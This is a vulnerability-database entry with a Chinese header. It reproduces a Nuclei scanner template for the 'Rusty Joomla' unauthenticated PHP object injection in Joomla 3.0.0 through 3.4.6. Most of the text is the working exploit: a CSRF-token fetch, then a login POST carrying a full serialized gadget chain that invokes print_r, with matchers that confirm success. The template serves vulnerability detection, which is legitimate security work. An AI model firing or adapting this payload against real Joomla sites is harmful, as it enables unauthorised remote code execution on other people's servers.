rusty-joomla: Joomla! CMS <=3.4.6 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Joomla! CMS | POC: 已公开

漏洞描述

Joomla! CMS 3.0.0 through the 3.4.6 release contains an unauthenticated PHP object injection that leads to remote code execution.

PoC代码[已公开]

id: rusty-joomla

info:
  name: Joomla! CMS <=3.4.6 - Remote Code Execution
  author: leovalcante,kiks7
  severity: critical
  description: |
    Joomla! CMS 3.0.0 through the 3.4.6 release contains an unauthenticated PHP object injection that leads to remote code execution.
  reference:
    - https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/
    - https://github.com/kiks7/rusty_joomla_rce
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: joomla,rce,unauth,php,cms,objectinjection,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1

    host-redirects: true
    max-redirects: 2

    extractors:
      - type: regex
        name: csrf
        part: body
        group: 1
        regex:
          - "<input type=\"hidden\" name=\"([0-9a-z]{32})\" value=\"1\""
        internal: true
    matchers:
      - type: word
        part: body
        words:
          - "http://rusty.jooml/;pkwxhxqxmdkkmscotwvh"
          - "Failed to decode session object"
        condition: and
# digest: 4b0a00483046022100c414d33f3e686a7db22048f8e12ad67ee5df11eecf2d14c0236b73a23e0097f5022100cfe3323a00dc24b4470b6153784df0162fba9b3deed1e49d0a1a81144518045e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/joomla/rusty-joomla.yaml